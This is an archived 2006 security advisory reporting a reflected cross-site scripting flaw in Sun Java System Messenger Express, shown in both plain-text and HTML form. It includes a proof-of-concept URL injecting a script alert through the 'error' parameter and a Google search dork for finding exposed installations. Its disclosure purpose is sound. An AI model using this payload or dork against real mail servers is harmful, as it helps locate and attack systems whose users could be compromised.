Home / os / blackberry

SystemMessenger_xss.txt

Posted on 02 November 2006

------=_Part_1542_5083137.1162268411579 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sun java System Messenger Express remote XSS vulnerabilities By: Handrix <handrix_at_morx_org> 29 November 2006 MorX security research team www.morx.org Description: Sun java System Messenger Express XSS The index script is vulnerable to XSS attacks, in functiion errorHTML . function errorHTML() { var s='' . . . document.write(s) ---> Need more case filetring the 's' var } So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks. Exploit: https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E Founded with Google by this dorks : intitle:"Sun Java(tm) System Messenger Express" Vulnerable versions : Sun java System Messenger Express Sun java System Messenger Express6 ------=_Part_1542_5083137.1162268411579 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Sun java System Messenger Express<br>remote XSS vulnerabilities<br>By: Handrix &lt;handrix_at_morx_org&gt;<br>29 November 2006<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br>Description: <br>Sun java System Messenger Express XSS<br><br>The index script&nbsp; is vulnerable to XSS attacks, in functiion errorHTML .<br><br>function errorHTML() {<br>&nbsp; var s=''<br>&nbsp; .<br>&nbsp; .<br>&nbsp; .<br><br>&nbsp; document.write(s) ---&gt; Need more case filetring the 's' var <br>}<br><br><br>So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.<br><br>Exploit:<br><a href="https://mail.victime.edu/?user=&amp;error=%3Cscript%3Ealert('hakin9');%3C/script%3E"> https://mail.victime.edu/?user=&amp;error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a><br><br>Founded with Google by this dorks :<br>intitle:&quot;Sun Java(tm) System Messenger Express&quot;<br><br>Vulnerable versions :<br> Sun java System Messenger Express<br>Sun java System Messenger Express6 ------=_Part_1542_5083137.1162268411579--

 

TOP